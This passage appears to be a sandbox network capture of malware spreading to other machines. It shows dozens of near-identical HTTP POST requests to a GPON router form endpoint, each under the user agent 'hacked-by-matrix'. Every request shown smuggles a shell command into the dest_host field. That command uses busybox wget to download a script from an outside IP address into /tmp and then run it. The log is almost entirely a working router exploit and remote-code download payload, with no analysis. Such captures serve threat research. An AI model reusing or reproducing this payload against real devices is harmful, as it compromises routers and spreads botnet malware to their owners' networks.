                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.1360138118.203.244.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468780994 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.135403242.127.173.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:59.468811035 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.1341526212.123.61.178443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476614952 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.1345612118.227.33.8443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476644993 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.1336154212.109.82.134443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476665974 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.1355228212.107.70.152443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476686001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.1349166109.149.68.37443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476706982 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.1355264118.68.137.75443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476728916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.1345466118.35.252.74443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476764917 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.1350696212.3.43.41443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476814985 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.1339086212.57.107.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476819992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        263192.168.2.134666842.70.187.221443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476874113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        264192.168.2.1344516212.149.67.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476905107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        265192.168.2.1346390109.5.247.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476911068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        266192.168.2.1350906109.41.17.31443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476970911 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        267192.168.2.1360792118.141.55.83443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476973057 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        268192.168.2.1360272212.117.246.25443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.476986885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        269192.168.2.1342886212.47.11.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.477004051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        270192.168.2.13490905.33.122.174443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.477052927 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        271192.168.2.1339060212.117.3.69443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.477073908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        272192.168.2.13379845.12.67.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.477108002 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        273192.168.2.1350202118.45.39.60443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:02.477122068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        274192.168.2.1360674109.98.159.13443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:05.484556913 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
